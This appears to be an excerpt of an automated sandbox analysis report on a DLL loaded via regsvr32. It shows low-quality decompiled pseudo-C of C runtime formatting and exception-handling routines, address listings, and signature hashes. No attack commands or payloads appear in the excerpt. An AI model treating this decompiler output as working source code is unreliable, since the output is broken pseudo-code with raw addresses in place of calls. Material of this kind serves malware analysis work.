                                                                    				_v24 = __rax;
                                                                    				goto 0xf9d34712;
                                                                    				_v24 = 0;
                                                                    				__rdx = _v24;
                                                                    				__rcx = _a8;
                                                                    				E000007FE7FEF9D35BB0(__rax, _a8, _v24) = __al & 0x000000ff;
                                                                    				__eflags = __al & 0x000000ff;
                                                                    				if ((__al & 0x000000ff) != 0) goto 0xf9d347d7;
                                                                    				__rax = _a16;
                                                                    				_v64 = _a16;
                                                                    				__r9 =  &_v80;
                                                                    				__r8 = _a40;
                                                                    				__rdx = _a32;
                                                                    				__rcx = _a16;
                                                                    				__eax = E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v80);
                                                                    				_v64 = __rax;
                                                                    				_v72 = 0;
                                                                    				__eax = _a48 & 0x000000ff;
                                                                    				_v200 = __al;
                                                                    				__rax = _a32;
                                                                    				_v208 = _a32;
                                                                    				__rax = _a40;
                                                                    				_v216 = _a40;
                                                                    				_v224 = 0xffffffff;
                                                                    				_v232 = 0;
                                                                    				__r9 = _v64;
                                                                    				__r8 = _a24;
                                                                    				__rdx = _a8;
                                                                    				__rcx = _a16;
                                                                    				__eax = E000007FE7FEF9D2EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
                                                                    				goto 0xf9d3484c;
                                                                    				__rax = _a40;
                                                                    				__eflags =  *(__rax + 0xc);
                                                                    				if ( *(__rax + 0xc) <= 0) goto 0xf9d3484c;
                                                                    				__eax = _a48 & 0x000000ff;
                                                                    				__eflags = _a48 & 0x000000ff;
                                                                    				if ((_a48 & 0x000000ff) != 0) goto 0xf9d34847;
                                                                    				__rax = _a64;
                                                                    				_v208 = _a64;
                                                                    				__eax = _a56;
                                                                    				_v216 = _a56;
                                                                    				__eax = _v168;
                                                                    				_v224 = _v168;
                                                                    				__rax = _a40;
                                                                    				_v232 = _a40;
                                                                    				__r9 = _a32;
                                                                    				__r8 = _a24;
                                                                    				__rdx = _a16;
                                                                    				__rcx = _a8;
                                                                    				__eax = E000007FE7FEF9D34960(__ecx, _a8, _a16, _a24, _a32);
                                                                    				goto 0xf9d3484c;
                                                                    				__eax = E000007FE7FEF9D2CF50(__rax);
                                                                    				0xf9d24000();
                                                                    				__eflags =  *((long long*)(__rax + 0x108));
                                                                    				if ( *((long long*)(__rax + 0x108)) != 0) goto 0xf9d3485d;
                                                                    				goto 0xf9d34862;
                                                                    				return E000007FE7FEF9D2CF80(__rax);
                                                                    			}










































                                                                    0x7fef9d340b0
                                                                    0x7fef9d340b0
                                                                    0x7fef9d340b5
                                                                    0x7fef9d340ba
                                                                    0x7fef9d340bf
                                                                    0x7fef9d340cb
                                                                    0x7fef9d340d0
                                                                    0x7fef9d340ea
                                                                    0x7fef9d3410b
                                                                    0x7fef9d34131
                                                                    0x7fef9d34133
                                                                    0x7fef9d3414d
                                                                    0x7fef9d34152
                                                                    0x7fef9d3416f
                                                                    0x7fef9d34174
                                                                    0x7fef9d34193
                                                                    0x7fef9d3419c
                                                                    0x7fef9d341ad
                                                                    0x7fef9d341af
                                                                    0x7fef9d341b1
                                                                    0x7fef9d341c4
                                                                    0x7fef9d341d6
                                                                    0x7fef9d341eb
                                                                    0x7fef9d341fc
                                                                    0x7fef9d3420d
                                                                    0x7fef9d34213
                                                                    0x7fef9d34220
                                                                    0x7fef9d34226
                                                                    0x7fef9d34233
                                                                    0x7fef9d34235
                                                                    0x7fef9d3423a
                                                                    0x7fef9d3423f
                                                                    0x7fef9d34246
                                                                    0x7fef9d3424e
                                                                    0x7fef9d3425a
                                                                    0x7fef9d34262
                                                                    0x7fef9d34273
                                                                    0x7fef9d3428c
                                                                    0x7fef9d3428e
                                                                    0x7fef9d34290
                                                                    0x7fef9d342a3
                                                                    0x7fef9d342b1
                                                                    0x7fef9d342c2
                                                                    0x7fef9d342d3
                                                                    0x7fef9d342e4
                                                                    0x7fef9d342e6
                                                                    0x7fef9d342f3
                                                                    0x7fef9d342f5
                                                                    0x7fef9d342fa
                                                                    0x7fef9d34307
                                                                    0x7fef9d3430d
                                                                    0x7fef9d34312
                                                                    0x7fef9d34319
                                                                    0x7fef9d3431e
                                                                    0x7fef9d34323
                                                                    0x7fef9d34345
                                                                    0x7fef9d34347
                                                                    0x7fef9d34358
                                                                    0x7fef9d34364
                                                                    0x7fef9d34378
                                                                    0x7fef9d3438c
                                                                    0x7fef9d34391
                                                                    0x7fef9d34393
                                                                    0x7fef9d343a6
                                                                    0x7fef9d343b8
                                                                    0x7fef9d343cd
                                                                    0x7fef9d343de
                                                                    0x7fef9d343ef
                                                                    0x7fef9d34401
                                                                    0x7fef9d3440f
                                                                    0x7fef9d3441c
                                                                    0x7fef9d34421
                                                                    0x7fef9d34429
                                                                    0x7fef9d3442e
                                                                    0x7fef9d34433
                                                                    0x7fef9d3444b
                                                                    0x7fef9d34450
                                                                    0x7fef9d34458
                                                                    0x7fef9d34463
                                                                    0x7fef9d34476
                                                                    0x7fef9d3448c
                                                                    0x7fef9d344a0
                                                                    0x7fef9d344a2
                                                                    0x7fef9d344b1
                                                                    0x7fef9d344b3
                                                                    0x7fef9d344b5
                                                                    0x7fef9d344c9
                                                                    0x7fef9d344dc
                                                                    0x7fef9d344ee
                                                                    0x7fef9d344fd
                                                                    0x7fef9d34501
                                                                    0x7fef9d34511
                                                                    0x7fef9d34517
                                                                    0x7fef9d3452c
                                                                    0x7fef9d34531
                                                                    0x7fef9d34539
                                                                    0x7fef9d34551
                                                                    0x7fef9d34558
                                                                    0x7fef9d34563
                                                                    0x7fef9d34572
                                                                    0x7fef9d34576
                                                                    0x7fef9d34586
                                                                    0x7fef9d3458c
                                                                    0x7fef9d3459f
                                                                    0x7fef9d345ca
                                                                    0x7fef9d345cc
                                                                    0x7fef9d345ce
                                                                    0x7fef9d345db
                                                                    0x7fef9d345e4
                                                                    0x7fef9d345f0
                                                                    0x7fef9d345fc
                                                                    0x7fef9d34608
                                                                    0x7fef9d34615
                                                                    0x7fef9d34622
                                                                    0x7fef9d3462f
                                                                    0x7fef9d34654
                                                                    0x7fef9d3465b
                                                                    0x7fef9d3465d
                                                                    0x7fef9d34662
                                                                    0x7fef9d34667
                                                                    0x7fef9d3466c
                                                                    0x7fef9d34671
                                                                    0x7fef9d34673
                                                                    0x7fef9d34679
                                                                    0x7fef9d34681
                                                                    0x7fef9d34683
                                                                    0x7fef9d34688
                                                                    0x7fef9d3468d
                                                                    0x7fef9d34693
                                                                    0x7fef9d3469b
                                                                    0x7fef9d3469f
                                                                    0x7fef9d346a1
                                                                    0x7fef9d346ae
                                                                    0x7fef9d346b5
                                                                    0x7fef9d346bd
                                                                    0x7fef9d346bf
                                                                    0x7fef9d346cb
                                                                    0x7fef9d346d4
                                                                    0x7fef9d346da
                                                                    0x7fef9d346e2
                                                                    0x7fef9d346e6
                                                                    0x7fef9d346e8
                                                                    0x7fef9d346f5
                                                                    0x7fef9d346f9
                                                                    0x7fef9d346fc
                                                                    0x7fef9d34704
                                                                    0x7fef9d34706
                                                                    0x7fef9d34712
                                                                    0x7fef9d3471a
                                                                    0x7fef9d34727
                                                                    0x7fef9d3472a
                                                                    0x7fef9d3472c
                                                                    0x7fef9d34732
                                                                    0x7fef9d3473a
                                                                    0x7fef9d34742
                                                                    0x7fef9d3474a
                                                                    0x7fef9d34752
                                                                    0x7fef9d3475a
                                                                    0x7fef9d34762
                                                                    0x7fef9d34767
                                                                    0x7fef9d3476f
                                                                    0x7fef9d3477b
                                                                    0x7fef9d34783
                                                                    0x7fef9d34787
                                                                    0x7fef9d3478f
                                                                    0x7fef9d34794
                                                                    0x7fef9d3479c
                                                                    0x7fef9d347a1
                                                                    0x7fef9d347a9
                                                                    0x7fef9d347b2
                                                                    0x7fef9d347ba
                                                                    0x7fef9d347c2
                                                                    0x7fef9d347ca
                                                                    0x7fef9d347d2
                                                                    0x7fef9d347d7
                                                                    0x7fef9d347d9
                                                                    0x7fef9d347e1
                                                                    0x7fef9d347e5
                                                                    0x7fef9d347e7
                                                                    0x7fef9d347ef
                                                                    0x7fef9d347f1
                                                                    0x7fef9d347f3
                                                                    0x7fef9d347fb
                                                                    0x7fef9d34800
                                                                    0x7fef9d34807
                                                                    0x7fef9d3480b
                                                                    0x7fef9d3480f
                                                                    0x7fef9d34813
                                                                    0x7fef9d3481b
                                                                    0x7fef9d34820
                                                                    0x7fef9d34828
                                                                    0x7fef9d34830
                                                                    0x7fef9d34838
                                                                    0x7fef9d34840
                                                                    0x7fef9d34845
                                                                    0x7fef9d34847
                                                                    0x7fef9d3484c
                                                                    0x7fef9d34851
                                                                    0x7fef9d34859
                                                                    0x7fef9d3485b
                                                                    0x7fef9d34869

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                                                    • String ID: bad exception$csm$csm$csm
                                                                    • API String ID: 3498492519-820278400
                                                                    • Opcode ID: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                                    • Instruction ID: b93d13205fcb5bf4744c4f5868d42f2397ba004b3dd065f5f3bbc86f0087c528
                                                                    • Opcode Fuzzy Hash: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                                    • Instruction Fuzzy Hash: C412D436A0DBC585DAB19B15E8407EEB7A0F7C8791F604126DACD87BA9CB7DD440CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                                                    • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 4023976971-2293733425
                                                                    • Opcode ID: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                                    • Instruction ID: fa666a0989dbdcd631dba14fdf712f3fd1171dc1b338b0fed7bc0ada6eb2a45d
                                                                    • Opcode Fuzzy Hash: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                                    • Instruction Fuzzy Hash: 8B024A72A0D7C28AE7B09B24E8447BEB7E4F384345F604126D6CC46AA9DB7EE545CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                    • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                                                    • API String ID: 530996419-3695252689
                                                                    • Opcode ID: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                                    • Instruction ID: dd73616ddae2cae72d7b30165dff30affe8ff5e8ed842a8499c58fb9266416ee
                                                                    • Opcode Fuzzy Hash: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                                    • Instruction Fuzzy Hash: FAD11832A1CBC585E7A09B15E8407AEB7A0F784794F605626E6DE83BE9DF3DD444CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                    • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                                                    • API String ID: 2192614184-1854130327
                                                                    • Opcode ID: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                                    • Instruction ID: 7076a95ac8019ae0c7cbf4bc144243c7f76c7d2257b38824bc8c592ccc79079f
                                                                    • Opcode Fuzzy Hash: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                                    • Instruction Fuzzy Hash: 33C10932A0D68286E7B09B54E8547BEB7E0F784744F604126E6CD87AE9CB7EE444CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2192614184-1870338870
                                                                    • Opcode ID: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                                    • Instruction ID: de6734cae50e00c17b19ae97f10413d83fe6e5a887ca475c0331002d176214a7
                                                                    • Opcode Fuzzy Hash: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                                    • Instruction Fuzzy Hash: 66D10972A0DA828AE7B09F64E8447AFB6E0F384349F604125D6CD47AE8DB7ED545CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 19%
                                                                    			E000007FE7FEF9D3C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                    				signed int _t223;
                                                                    				signed char _t228;
                                                                    				intOrPtr _t263;
                                                                    				signed int _t338;
                                                                    				signed int _t339;
                                                                    				signed long long _t342;
                                                                    				intOrPtr* _t365;
                                                                    				signed long long _t390;
                                                                    
                                                                    				_t338 = __rax;
                                                                    				_a80 = _a80 | 0x00000040;
                                                                    				_a72 = 0xa;
                                                                    				_a72 = 0xa;
                                                                    				_a116 = 0x10;
                                                                    				asm("bts eax, 0xf");
                                                                    				_a708 = 7;
                                                                    				_a708 = 0x27;
                                                                    				_a72 = 0x10;
                                                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                                    				_a84 = 0x30;
                                                                    				_a85 = _a708 + 0x51;
                                                                    				_a92 = 2;
                                                                    				_a72 = 8;
                                                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                                    				asm("bts eax, 0x9");
                                                                    				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                                    				E000007FE7FEF9D31EA0( &_a1112);
                                                                    				_a824 = _t338;
                                                                    				goto 0xf9d3c84b;
                                                                    				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                                    				E000007FE7FEF9D31EA0( &_a1112);
                                                                    				_a824 = _t338;
                                                                    				goto 0xf9d3c84b;
                                                                    				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                                    				_t339 = E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t339;
                                                                    				goto 0xf9d3c80e;
                                                                    				E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t339;
                                                                    				goto 0xf9d3c84b;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                                    				E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t339;
                                                                    				goto 0xf9d3c84b;
                                                                    				E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t339;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                                    				if (_a824 >= 0) goto 0xf9d3c882;
                                                                    				_a832 =  ~_a824;
                                                                    				asm("bts eax, 0x8");
                                                                    				goto 0xf9d3c892;
                                                                    				_t342 = _a824;
                                                                    				_a832 = _t342;
                                                                    				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                                    				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                                    				_a832 = _a832 & _t342;
                                                                    				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                                    				_a116 = 1;
                                                                    				goto 0xf9d3c8f5;
                                                                    				_a80 = _a80 & 0xfffffff7;
                                                                    				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                                    				_a116 = 0x200;
                                                                    				if (_a832 != 0) goto 0xf9d3c908;
                                                                    				_a92 = 0;
                                                                    				_a64 =  &_a687;
                                                                    				_t223 = _a116;
                                                                    				_a116 = _a116 - 1;
                                                                    				if (_t223 > 0) goto 0xf9d3c936;
                                                                    				if (_a832 == 0) goto 0xf9d3c9d3;
                                                                    				_a1040 = _a72;
                                                                    				_a816 = _t223 / _a1040 + 0x30;
                                                                    				_a1048 = _a72;
                                                                    				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                                    				_t228 = _a816 + _a708;
                                                                    				_a816 = _t228;
                                                                    				 *_a64 = _a816 & 0x000000ff;
                                                                    				_a64 = _a64 - 1;
                                                                    				goto 0xf9d3c915;
                                                                    				_a104 = _t228;
                                                                    				_a64 = _a64 + 1;
                                                                    				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                                    				if (_a104 == 0) goto 0xf9d3ca12;
                                                                    				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                                    				_a64 = _a64 - 1;
                                                                    				 *_a64 = 0x30;
                                                                    				_a104 = _a104 + 1;
                                                                    				if (_a108 != 0) goto 0xf9d3cc6e;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                                    				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                                    				_a84 = 0x2d;
                                                                    				_a92 = 1;
                                                                    				goto 0xf9d3ca95;
                                                                    				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                                    				_a84 = 0x2b;
                                                                    				_a92 = 1;
                                                                    				goto 0xf9d3ca95;
                                                                    				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                                    				_a84 = 0x20;
                                                                    				_a92 = 1;
                                                                    				_a840 = _a88 - _a104 - _a92;
                                                                    				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                    				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                    				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                                    				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                                    				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                                    				if (_a76 == 0) goto 0xf9d3cc1d;
                                                                    				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                                    				_a872 = 0;
                                                                    				_a848 = _a64;
                                                                    				_a856 = _a104;
                                                                    				_a856 = _a856 - 1;
                                                                    				if (_a856 == 0) goto 0xf9d3cc1b;
                                                                    				_a1056 =  *_a848 & 0x0000ffff;
                                                                    				r9d = _a1056 & 0x0000ffff;
                                                                    				r8d = 6;
                                                                    				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                                    				_a848 =  &(_a848[1]);
                                                                    				if (_a872 != 0) goto 0xf9d3cbe5;
                                                                    				if (_a860 != 0) goto 0xf9d3cbf2;
                                                                    				_a688 = 0xffffffff;
                                                                    				goto 0xf9d3cc1b;
                                                                    				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                    				goto 0xf9d3cb60;
                                                                    				goto 0xf9d3cc3b;
                                                                    				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                    				if (_a688 < 0) goto 0xf9d3cc6e;
                                                                    				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                    				if (_a96 == 0) goto 0xf9d3cc8e;
                                                                    				0xf9d25330();
                                                                    				_a96 = 0;
                                                                    				goto 0xf9d3b99c;
                                                                    				if (_a704 == 0) goto 0xf9d3ccb4;
                                                                    				if (_a704 == 7) goto 0xf9d3ccb4;
                                                                    				_a1060 = 0;
                                                                    				goto 0xf9d3ccbf;
                                                                    				_a1060 = 1;
                                                                    				_t263 = _a1060;
                                                                    				_a876 = _t263;
                                                                    				if (_a876 != 0) goto 0xf9d3cd05;
                                                                    				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                    				_a32 = _t365;
                                                                    				r9d = 0;
                                                                    				r8d = 0x8f5;
                                                                    				0xf9d2b3b0();
                                                                    				if (_t263 != 1) goto 0xf9d3cd05;
                                                                    				asm("int3");
                                                                    				if (_a876 != 0) goto 0xf9d3cd61;
                                                                    				0xf9d2ab30();
                                                                    				 *_t365 = 0x16;
                                                                    				_a32 = 0;
                                                                    				r9d = 0x8f5;
                                                                    				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                    				_a912 = 0xffffffff;
                                                                    				E000007FE7FEF9D26800( &_a120);
                                                                    				goto 0xf9d3cd80;
                                                                    				_a916 = _a688;
                                                                    				E000007FE7FEF9D26800( &_a120);
                                                                    				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                    			}











                                                                    0x7fef9d3c6d6
                                                                    0x7fef9d3c6dd
                                                                    0x7fef9d3c6e1
                                                                    0x7fef9d3c6ee
                                                                    0x7fef9d3c6f8
                                                                    0x7fef9d3c704
                                                                    0x7fef9d3c70c
                                                                    0x7fef9d3c719
                                                                    0x7fef9d3c724
                                                                    0x7fef9d3c737
                                                                    0x7fef9d3c739
                                                                    0x7fef9d3c748
                                                                    0x7fef9d3c74c
                                                                    0x7fef9d3c756
                                                                    0x7fef9d3c769
                                                                    0x7fef9d3c76f
                                                                    0x7fef9d3c782
                                                                    0x7fef9d3c78c
                                                                    0x7fef9d3c791
                                                                    0x7fef9d3c799
                                                                    0x7fef9d3c7a9
                                                                    0x7fef9d3c7b3
                                                                    0x7fef9d3c7b8
                                                                    0x7fef9d3c7c0
                                                                    0x7fef9d3c7ce
                                                                    0x7fef9d3c7d9
                                                                    0x7fef9d3c7e8
                                                                    0x7fef9d3c7ec
                                                                    0x7fef9d3c7f4
                                                                    0x7fef9d3c7fe
                                                                    0x7fef9d3c806
                                                                    0x7fef9d3c80e
                                                                    0x7fef9d3c819
                                                                    0x7fef9d3c823
                                                                    0x7fef9d3c82a
                                                                    0x7fef9d3c832
                                                                    0x7fef9d3c83c
                                                                    0x7fef9d3c843
                                                                    0x7fef9d3c854
                                                                    0x7fef9d3c85f
                                                                    0x7fef9d3c86c
                                                                    0x7fef9d3c878
                                                                    0x7fef9d3c880
                                                                    0x7fef9d3c882
                                                                    0x7fef9d3c88a
                                                                    0x7fef9d3c89d
                                                                    0x7fef9d3c8aa
                                                                    0x7fef9d3c8bf
                                                                    0x7fef9d3c8cc
                                                                    0x7fef9d3c8ce
                                                                    0x7fef9d3c8d6
                                                                    0x7fef9d3c8df
                                                                    0x7fef9d3c8eb
                                                                    0x7fef9d3c8ed
                                                                    0x7fef9d3c8fe
                                                                    0x7fef9d3c900
                                                                    0x7fef9d3c910
                                                                    0x7fef9d3c915
                                                                    0x7fef9d3c91f
                                                                    0x7fef9d3c925
                                                                    0x7fef9d3c930
                                                                    0x7fef9d3c93b
                                                                    0x7fef9d3c95e
                                                                    0x7fef9d3c96a
                                                                    0x7fef9d3c997
                                                                    0x7fef9d3c9a9
                                                                    0x7fef9d3c9ab
                                                                    0x7fef9d3c9bf
                                                                    0x7fef9d3c9c9
                                                                    0x7fef9d3c9ce
                                                                    0x7fef9d3c9e0
                                                                    0x7fef9d3c9ec
                                                                    0x7fef9d3c9fc
                                                                    0x7fef9d3ca03
                                                                    0x7fef9d3ca10
                                                                    0x7fef9d3ca1a
                                                                    0x7fef9d3ca24
                                                                    0x7fef9d3ca2d
                                                                    0x7fef9d3ca36
                                                                    0x7fef9d3ca45
                                                                    0x7fef9d3ca52
                                                                    0x7fef9d3ca54
                                                                    0x7fef9d3ca59
                                                                    0x7fef9d3ca61
                                                                    0x7fef9d3ca6c
                                                                    0x7fef9d3ca6e
                                                                    0x7fef9d3ca73
                                                                    0x7fef9d3ca7b
                                                                    0x7fef9d3ca86
                                                                    0x7fef9d3ca88
                                                                    0x7fef9d3ca8d
                                                                    0x7fef9d3caa5
                                                                    0x7fef9d3cab5
                                                                    0x7fef9d3cad0
                                                                    0x7fef9d3caee
                                                                    0x7fef9d3cafc
                                                                    0x7fef9d3cb07
                                                                    0x7fef9d3cb22
                                                                    0x7fef9d3cb2c
                                                                    0x7fef9d3cb37
                                                                    0x7fef9d3cb3d
                                                                    0x7fef9d3cb4d
                                                                    0x7fef9d3cb59
                                                                    0x7fef9d3cb70
                                                                    0x7fef9d3cb79
                                                                    0x7fef9d3cb8a
                                                                    0x7fef9d3cb92
                                                                    0x7fef9d3cb9b
                                                                    0x7fef9d3cbb6
                                                                    0x7fef9d3cbc9
                                                                    0x7fef9d3cbd9
                                                                    0x7fef9d3cbe3
